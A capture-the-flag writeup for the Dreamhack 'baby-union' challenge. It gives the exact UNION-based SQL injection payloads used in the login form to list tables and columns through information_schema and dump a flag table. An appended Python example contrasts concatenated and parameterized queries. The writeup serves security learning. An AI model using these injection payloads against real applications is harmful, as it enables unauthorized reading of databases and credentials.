
# \[Dreamhack] Baby-union Writeup

#### Challenge link

<https://dreamhack.io/wargame/challenges/984>

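[baby-union: Description: A web service that prints the account's information on login. Obtain the flag through the SQL injection vulnerability. The table and column names in the init.sql file provided with the challenge differ from the actual names. … dreamhack.io](https://dreamhack.io/wargame/challenges/984)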

#### Challenge

<figure><img src="https://blog.kakaocdn.net/dna/bQgJLj/btsEtu8OXLX/AAAAAAAAAAAAAAAAAAAAAOy1QPOlofJ3X0l5fuI34n5_HufCCcMMC6f2rQBbGa1x/img.jpg?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=WvMCaZnol2O0JbVH37RHzYKijDQ%3D" alt="" height="347" width="1012"><figcaption></figcaption></figure>

#### Solution

```
'
```

Enter the value above in the uid field,

```
union select table_name, null, null, null from information_schema.tables#
```

and enter the value above in the upw field. This relies on the fact that the number of columns is four.

<figure><img src="https://blog.kakaocdn.net/dna/zgumi/btsEqugXd5T/AAAAAAAAAAAAAAAAAAAAAKJhxEyA7Xh7bXDWE8Wnkv6XncGcR_eiGs_TnBc8k4Tv/img.jpg?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=JIt54i9q2e9ATm0LhOzAbSJ7bZk%3D" alt="" height="422" width="1250"><figcaption></figcaption></figure>

<figure><img src="https://blog.kakaocdn.net/dna/b7ffhE/btsEuN77GN4/AAAAAAAAAAAAAAAAAAAAAEMMkjoB0eLA0KuDGYPegCSCY6XC3NvU-CFXiJa4gsgK/img.jpg?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=bYyYJa%2FUFFhFPw3CmIgvGMXXSbk%3D" alt="" height="460" width="1168"><figcaption></figcaption></figure>

Submitting these in the prompt brings up the window shown above. Since onlyflag looks related to the flag value, go back to the login page and

```
'
```

enter the value above for uid,

```
union select column_name, null, null, null from
information_schema.columns where table_name='onlyflag' #
```

and enter the value above for upw.

<figure><img src="https://blog.kakaocdn.net/dna/TKyai/btsEpptAYvs/AAAAAAAAAAAAAAAAAAAAANhDSN372lQSDqw8pK14_1PmJCajgletl6ncMIJ7N4kE/img.jpg?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=KQam%2BuTiKeoVYu9a3eyBJclVpRc%3D" alt="" height="445" width="1227"><figcaption></figcaption></figure>

This reveals the columns in onlyflag. If sname, svalue, sflag, and sclose are all entered on the login page next, without omitting any of them, a fake flag is printed, as shown below.

<figure><img src="https://blog.kakaocdn.net/dna/6HWBf/btsEoJ6tlO6/AAAAAAAAAAAAAAAAAAAAAPjl2LAt2VbZvfKJrDDfi3TLLefX4K1l9QIi1XCCClJW/img.jpg?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=cnLq042asmbMmqZUUZtret%2FBsg0%3D" alt="" height="321" width="907"><figcaption></figcaption></figure>

So the input is entered again:

```
'
```

this for uid,

```
union select svalue, sflag, null, sclose from onlyflag #
```

and this for upw. (The reason is that, according to the code in the original source file, the number of columns we can see is limited to three, so one of the columns is replaced with a null value.)

<figure><img src="https://blog.kakaocdn.net/dna/blhhL4/btsEppUF4JZ/AAAAAAAAAAAAAAAAAAAAAJaNYCGYQwt0EetFECPLO7HgYA-dLeIphS32UNh_zf1T/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=XdlEeyESi0fM3JlHz0sCmJXZ7PA%3D" alt="" height="340" width="1092"><figcaption></figcaption></figure>
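The following is an added example, not code from the challenge or from this writeup: it contrasts a login query built by string concatenation with a parameterized one, using the uid/upw inputs from the last step. The query template, the `users` table layout, and the sample rows are assumptions constructed for illustration, and SQLite stands in for the challenge's database.

```python
import sqlite3

# uid/upw values exactly as given in the final step of the writeup
PAGE_UID = "'"
PAGE_UPW = "union select svalue, sflag, null, sclose from onlyflag #"

def make_db():
    """Constructed sample data; the users column names are assumptions."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (idx INTEGER, uid TEXT, upw TEXT, descr TEXT);
        INSERT INTO users VALUES (1, 'guest', 'guest', 'guest account');
        CREATE TABLE onlyflag (sname TEXT, svalue TEXT, sflag TEXT, sclose TEXT);
        INSERT INTO onlyflag VALUES ('n', 'v', 'FLAG{constructed}', 'c');
    """)
    return db

def build_concatenated(uid, upw):
    """Vulnerable pattern (assumed template): input pasted into the SQL text."""
    return f"SELECT * FROM users WHERE uid='{uid}' AND upw='{upw}';"

def skeleton(sql):
    """SQL text with each '...' literal replaced by ? and # comments dropped.
    Simplified MySQL-style scan: '' is an escaped quote, backslashes ignored."""
    out, i, in_str = [], 0, False
    while i < len(sql):
        ch = sql[i]
        if in_str:
            if ch == "'" and sql[i + 1:i + 2] == "'":
                i += 1            # escaped quote: still inside the literal
            elif ch == "'":
                in_str = False
        elif ch == "'":
            in_str = True
            out.append("?")
        elif ch == "#":
            break                 # rest of the line is a comment
        else:
            out.append(ch)
        i += 1
    return "".join(out)

def structure_changed(uid, upw):
    """True when the input altered the statement instead of only its literals."""
    return skeleton(build_concatenated(uid, upw)) != skeleton(build_concatenated("a", "b"))

def login_parameterized(db, uid, upw):
    """Hardened pattern: both values are bound as data, never parsed as SQL."""
    return db.execute("SELECT * FROM users WHERE uid = ? AND upw = ?", (uid, upw)).fetchall()
```

`skeleton()` shows that in the concatenated form the single quote in uid turns ` AND upw=` into part of a string literal, so the upw text is parsed as SQL; with bound parameters the same inputs are only compared as values and match no row.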


